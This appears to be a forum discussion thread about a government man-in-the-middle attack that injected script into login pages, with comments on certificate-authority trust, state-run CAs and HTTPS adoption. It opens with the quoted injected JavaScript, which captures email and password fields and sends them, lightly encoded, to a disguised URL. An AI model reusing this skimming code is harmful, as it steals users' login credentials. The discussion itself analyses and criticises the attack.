Http://www.google.com/wo0dh3ad
<script language="javascript"> <!-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() {var frm = document.getElementById("gaia_loginform"); var us3r = frm.Email.value; var pa55 = frm.Passwd.value; var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);} function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;} function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");} function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");} //-->
</script>
36 comments
[ 3.0 ms ] story [ 90.3 ms ] threadEncryption/certificate validation make it much harder to pull of a MITM attack like this, especially by companies and small repressive governments.
Even more scary is the thought experiment that Microsoft might cooperate with the Tunisian government and allow installing trust for such a root certificate via the windows update mechanism. (I have no evidence that this actually happens, it just seems a convenient vector)
[1] They're under no time pressure and can transparently proxy every single TCP connection and IP packet if they so desire. They control DNS.
Also it's pretty much impossible to patch and protect against, even if you know the exploit exists.
But let's think in a wider scope (disclaimer: this is not my idea, I remember reading about it a long time ago): what if a certain cryptographic "magic code" at the beginning of a memory page would trigger the execution of arbitrary code embedded in that page?
Such a thing could be triggered over the network, wireless through bluetooth/wifi, or by specially crafted images on a webpage, or whatever creative technique you can think of. It'd effectively give the govt instant root access to any device with the affected CPUs.
It'd be mighty interesting to tear apart / scan / reverse engineer some modern CPUs like they did with the 6502. Then again, these beasts are so complex that's similar to looking for a needle in a galaxy-sized haystack.
If you mean the certificates that the certificate authority issues, then the certificate authority signs them itself.
If you mean who signs the certificate authority's authority certificate, then either another certificate authority signs it, or the certificate authority signs it itself and pays the browser makers to include it as a root certificate in their browsers.
I'm not sure what you're trying to get at?
If a UAE state-controlled telecoms company can become a CA, why not an Iranian state-controlled telecoms company? Or Chinese?
Modern browsers today accept a large number of "self-signed" certificates. The key is that the signer paid the browser makers money for that privilege. SSL assumes that those companies are all trustworthy, but is any company trustworthy when the government shows up with guns and asks for the master password to your key signer?
If no, then SSL fails.
Let me summarize because you seem to be misunderstanding: a lot of untrustworthy parties are trusted by browsers. This makes SSL somewhat useful against having a coffee shop steal your Facebook password, but almost certainly useless against having a government steal your password.
Using SSL(TLS) everywhere would go a long way toward security. It's much preferable over plaintext.
I really loathe arguments like "it's not perfectly secure, so let's use something even less secure". Making it harder means a larger investment for the attacker, especially as they have to do the certificate trick for each individual site instead of some simple interception blanket.
When the government or ISP in question controls its own certificate authority (and many do), they can MITM you even over HTTPS. Yes, it's another speedbump for them to get over. No, it's not going to stop them.
The X.509 security model is broken and needs fixing or replacing.
In some countries I work in we routinely come across censorship and all kinds of dodgy goings on, so we have a variety of tunnelling methods (VPN, SSH, ICMPTX, DNSTX, Tor and a few non-public tunnelling options). For the most part as long as you can terminate a connection in somewhere you're fairly comfortable with you're better off.
Also don't make the mistake of feeling that the US, UK or EU are automatically comfortable options. It all depends what you're doing with the data. A little common sense goes a long way.
And with 'HTTPS everywhere', I also mean removing the HTTP fallback. Fallbacks to plaintext (that can be triggered by a MITM) are indeed obvious backdoors that should be avoided in any protocol.
Quite a few of Tunisian websites are signed by "Agence Nationale de Certification Electronique".
Also, there so many intermediate CA's that I find it hard to believe that the system isn't broken:
https://www.eff.org/files/colour_map_of_CAs.pdf (via https://www.eff.org/observatory)
We already had UAE government successfully MITM-ing SSL by forcing CyberTrust-delegated CA to forge a certificate:
http://www.schneier.com/blog/archives/2010/09/uae_man-in-the...
Why would the Tunisian government have allowed ISPs to forward these requests? Facebook probably knows nothing about this.
Think of your users. Some of them will be accessing your sites from oppressive regimes. Let them do so safely.
Taking Facebook as an example, considering how global their usage is, and the amount of sensitive data peoples accounts contain, it's unforgivable that they don't force HTTPS traffic for everything.
http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-bl...